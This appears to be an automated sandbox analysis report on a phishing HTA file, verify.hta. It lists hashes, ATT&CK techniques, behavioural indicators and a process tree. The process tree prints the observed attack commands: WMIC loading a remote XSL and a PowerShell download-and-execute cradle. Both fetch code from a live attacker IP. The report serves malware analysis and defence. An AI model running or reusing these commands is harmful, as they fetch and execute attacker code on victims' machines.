e1781322c82511bd2859999c9627453450f2e68cc7c76b20a3893820b99e3b19

Analysis

max time kernel
119s
max time network
129s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
20/11/2024, 14:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

verify.hta
Size

2KB
MD5

37ca0a9229af22173e81d6ace1f49a3f
SHA1

7b15c031a6673d2d48d045d750e0ef17df1ed46f
SHA256

e1781322c82511bd2859999c9627453450f2e68cc7c76b20a3893820b99e3b19
SHA512

fc6af18e2fc1c4602de7bcfff1c4ea233bda838a144bd2c13e3daf3ef5c79639d876a502881b340cd6646e1ecf7ed917b6e4f0a9f11c77128811671fbf6a1edb

Score

8^/10

google discovery phishing

Malware Config

Signatures

Blocklisted process makes network request 10 IoCs

flow	pid	Process
5	1824	mshta.exe
6	1824	mshta.exe
10	1824	mshta.exe
11	1824	mshta.exe
14	1824	mshta.exe
15	1824	mshta.exe
18	1824	mshta.exe
19	1824	mshta.exe
21	2908	WMIC.exe
22	3012	powershell.exe

A potential corporate email address has been identified in the URL: [email protected]
phishing
Detected potential entity reuse from brand GOOGLE.
phishing google
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
1456	timeout.exe
1440	timeout.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
3012	powershell.exe

Suspicious use of AdjustPrivilegeToken 41 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2908	WMIC.exe
Token: SeSecurityPrivilege	2908	WMIC.exe
Token: SeTakeOwnershipPrivilege	2908	WMIC.exe
Token: SeLoadDriverPrivilege	2908	WMIC.exe
Token: SeSystemProfilePrivilege	2908	WMIC.exe
Token: SeSystemtimePrivilege	2908	WMIC.exe
Token: SeProfSingleProcessPrivilege	2908	WMIC.exe
Token: SeIncBasePriorityPrivilege	2908	WMIC.exe
Token: SeCreatePagefilePrivilege	2908	WMIC.exe
Token: SeBackupPrivilege	2908	WMIC.exe
Token: SeRestorePrivilege	2908	WMIC.exe
Token: SeShutdownPrivilege	2908	WMIC.exe
Token: SeDebugPrivilege	2908	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2908	WMIC.exe
Token: SeRemoteShutdownPrivilege	2908	WMIC.exe
Token: SeUndockPrivilege	2908	WMIC.exe
Token: SeManageVolumePrivilege	2908	WMIC.exe
Token: 33	2908	WMIC.exe
Token: 34	2908	WMIC.exe
Token: 35	2908	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2908	WMIC.exe
Token: SeSecurityPrivilege	2908	WMIC.exe
Token: SeTakeOwnershipPrivilege	2908	WMIC.exe
Token: SeLoadDriverPrivilege	2908	WMIC.exe
Token: SeSystemProfilePrivilege	2908	WMIC.exe
Token: SeSystemtimePrivilege	2908	WMIC.exe
Token: SeProfSingleProcessPrivilege	2908	WMIC.exe
Token: SeIncBasePriorityPrivilege	2908	WMIC.exe
Token: SeCreatePagefilePrivilege	2908	WMIC.exe
Token: SeBackupPrivilege	2908	WMIC.exe
Token: SeRestorePrivilege	2908	WMIC.exe
Token: SeShutdownPrivilege	2908	WMIC.exe
Token: SeDebugPrivilege	2908	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2908	WMIC.exe
Token: SeRemoteShutdownPrivilege	2908	WMIC.exe
Token: SeUndockPrivilege	2908	WMIC.exe
Token: SeManageVolumePrivilege	2908	WMIC.exe
Token: 33	2908	WMIC.exe
Token: 34	2908	WMIC.exe
Token: 35	2908	WMIC.exe
Token: SeDebugPrivilege	3012	powershell.exe

Suspicious use of WriteProcessMemory 36 IoCs

description	pid	Process	procid_target
PID 1824 wrote to memory of 2500	1824	mshta.exe	30
PID 1824 wrote to memory of 2500	1824	mshta.exe	30
PID 1824 wrote to memory of 2500	1824	mshta.exe	30
PID 1824 wrote to memory of 2500	1824	mshta.exe	30
PID 1824 wrote to memory of 1456	1824	mshta.exe	32
PID 1824 wrote to memory of 1456	1824	mshta.exe	32
PID 1824 wrote to memory of 1456	1824	mshta.exe	32
PID 1824 wrote to memory of 1456	1824	mshta.exe	32
PID 2500 wrote to memory of 2320	2500	cmd.exe	34
PID 2500 wrote to memory of 2320	2500	cmd.exe	34
PID 2500 wrote to memory of 2320	2500	cmd.exe	34
PID 2500 wrote to memory of 2320	2500	cmd.exe	34
PID 2500 wrote to memory of 2908	2500	cmd.exe	35
PID 2500 wrote to memory of 2908	2500	cmd.exe	35
PID 2500 wrote to memory of 2908	2500	cmd.exe	35
PID 2500 wrote to memory of 2908	2500	cmd.exe	35
PID 2908 wrote to memory of 2764	2908	WMIC.exe	38
PID 2908 wrote to memory of 2764	2908	WMIC.exe	38
PID 2908 wrote to memory of 2764	2908	WMIC.exe	38
PID 2908 wrote to memory of 2764	2908	WMIC.exe	38
PID 2764 wrote to memory of 2996	2764	cmd.exe	40
PID 2764 wrote to memory of 2996	2764	cmd.exe	40
PID 2764 wrote to memory of 2996	2764	cmd.exe	40
PID 2764 wrote to memory of 2996	2764	cmd.exe	40
PID 2764 wrote to memory of 3012	2764	cmd.exe	41
PID 2764 wrote to memory of 3012	2764	cmd.exe	41
PID 2764 wrote to memory of 3012	2764	cmd.exe	41
PID 2764 wrote to memory of 3012	2764	cmd.exe	41
PID 2996 wrote to memory of 3028	2996	cmd.exe	42
PID 2996 wrote to memory of 3028	2996	cmd.exe	42
PID 2996 wrote to memory of 3028	2996	cmd.exe	42
PID 2996 wrote to memory of 3028	2996	cmd.exe	42
PID 1824 wrote to memory of 1440	1824	mshta.exe	43
PID 1824 wrote to memory of 1440	1824	mshta.exe	43
PID 1824 wrote to memory of 1440	1824	mshta.exe	43
PID 1824 wrote to memory of 1440	1824	mshta.exe	43

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\verify.hta"
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1824
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c echo os get /format:"http://3.140.250.70/WMI.xsl" | C:\Windows\System32\wbem\WMIC.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo os get /format:"http://3.140.250.70/WMI.xsl" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2320
- - C:\Windows\SysWOW64\wbem\WMIC.exe
    C:\Windows\System32\wbem\WMIC.exe
    3⤵
    - Blocklisted process makes network request
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2908
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /b echo iex((New-Object Net.WebClient).DownloadString('http://3.140.250.70/payloade')) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2764
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" start /b echo iex((New-Object Net.WebClient).DownloadString('http://3.140.250.70/payloade')) "
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2996
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K echo iex((New-Object Net.WebClient).DownloadString('http://3.140.250.70/payloade'))
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3028
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -
        5⤵
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3012
- C:\Windows\SysWOW64\timeout.exe
  "C:\Windows\System32\timeout.exe" /T 2 /nobreak
  2⤵
  - System Location Discovery: System Language Discovery
  - Delays execution with timeout.exe
  PID:1456
- C:\Windows\SysWOW64\timeout.exe
  "C:\Windows\System32\timeout.exe" /T 1 /nobreak
  2⤵
  - System Location Discovery: System Language Discovery
  - Delays execution with timeout.exe
  PID:1440

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K0PVW9XR\favicon[1].ico

Filesize
5KB

MD5
f3418a443e7d841097c714d69ec4bcb8

SHA1
49263695f6b0cdd72f45cf1b775e660fdc36c606

SHA256
6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770

SHA512
82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563

Download Submit